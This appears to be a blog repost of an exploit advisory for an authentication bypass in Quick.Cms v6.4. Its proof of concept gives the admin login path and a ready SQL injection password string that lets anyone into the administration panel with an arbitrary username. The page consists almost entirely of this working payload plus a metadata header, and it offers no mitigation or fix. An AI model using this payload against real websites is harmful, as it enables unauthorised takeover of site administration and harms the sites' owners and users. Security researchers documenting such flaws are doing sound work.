Home Bypass Sql Injection Quick.Cms_v6.4 Autentication Bypass Vulnerability

Quick.Cms_v6.4 Autentication Bypass Vulnerability

,
___________________________________________________
|
| Exploit Title: Quick.Cms_v6.4 Autentication Bypass
| Exploit Author: Ashiyane Digital security Team
| Vendor Homepage: http://opensolution.org
| Software Link: http://opensolution.org/download/home.html?sFile=Quick.Cms_v6.4-en.zip
| Version: Quick.Cms_v6.4
| Date: 2017-10-14
| Category: webapps
| Tested on: Kali-Linux /FireFox
| CVE: N/A
| Dork: N/A
|__________________________________________________
The vulnerability is in the login area of Quick.Cms_v6.4, where we can enter the panel only using some parameters such as password __________________________________________________
Proof of Concept : http://127.0.0.1/PATH/admin.php => User: attacker@gmail.com Pass: '=''or' __________________________________________________
Discovered By : M.R.S.L.Y
__________________________________________________

Quick.Cms_v6.4 Autentication Bypass Vulnerability Quick.Cms_v6.4 Autentication Bypass Vulnerability Reviewed by Izza009 on 09.16 Rating: 5

Tidak ada komentar:

Langganan: Posting Komentar ( Atom )
Diberdayakan oleh Blogger.